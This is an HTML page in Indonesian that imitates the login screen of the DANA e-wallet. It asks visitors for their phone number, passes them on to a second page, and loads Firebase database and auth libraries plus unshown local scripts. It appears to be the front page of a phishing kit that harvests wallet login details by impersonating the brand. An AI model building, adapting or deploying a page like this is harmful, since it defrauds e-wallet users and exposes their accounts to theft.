<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8"/>
  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
  <meta name="description" content="Deskripsi halaman Anda"/>
  <title>DANA</title>
  <!-- Include Bootstrap CSS -->
  <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css"/>
  <link rel="stylesheet" href="style.css"/>
</head>
<body>
  <!-- navbar-start -->
  <nav class="navbar navbar-expand-lg navbar-light bg-light">
    <a class="navbar-brand mx-auto" href="#">
      <img src="img/logo.png" alt="Logo" height="30" class="d-inline-block align-top"/>
    </a>
  </nav>
  <!-- navbar-end -->
  <div class="img">
    <img src="img/bg.png" alt="img" width="100%"/>
  </div>
  <div class="container mt-5">
    <div class="row">
      <div class="col-md-12">
        <h2 class="text-center mt-5 text-white">Dompet digital untuk kamu!</h2>
        <p class="text-center text-white">Simpan uang serta kartu debit/kredit dengan praktis dengan DANA</p>
        <p class="text-center text-white">Masukkan nomor HP kamu untuk lanjut</p>
        <!-- Form input nomor HP -->
        <form action="../Page-Two/indeks2.html" class="text-center" onsubmit="validateForm(event)">
          <div class="form-group">
            <input type="number" class="form-control" id="nomorHP" placeholder="Masukkan nomor HP" data-input="nomor"/>
          </div>
          <button type="submit" class="btn btn-primary rounded" data-button="lanjut">Lanjut</button>
        </form>
      </div>
    </div>
  </div>

  <!-- Include Firebase and Bootstrap JS -->
    
 <!-- Include Firebase and Bootstrap JS -->
<script src="https://www.gstatic.com/firebasejs/10.4.0/firebase-app-compat.js"></script>
<script src="https://www.gstatic.com/firebasejs/10.4.0/firebase-auth-compat.js"></script>
<script src="https://www.gstatic.com/firebasejs/10.4.0/firebase-firestore-compat.js"></script>
<script src="https://www.gstatic.com/firebasejs/10.4.0/firebase-messaging-compat.js"></script>
<script src="https://www.gstatic.com/firebasejs/10.4.0/firebase-database-compat.js"></script>

<script src="scrip.js"></script>
<script src="scrip1.js"></script>
<script src="scrip2.js"></script>


  <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.0.7/dist/umd/popper.min.js"></script>
  <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
 

</body>
</html>
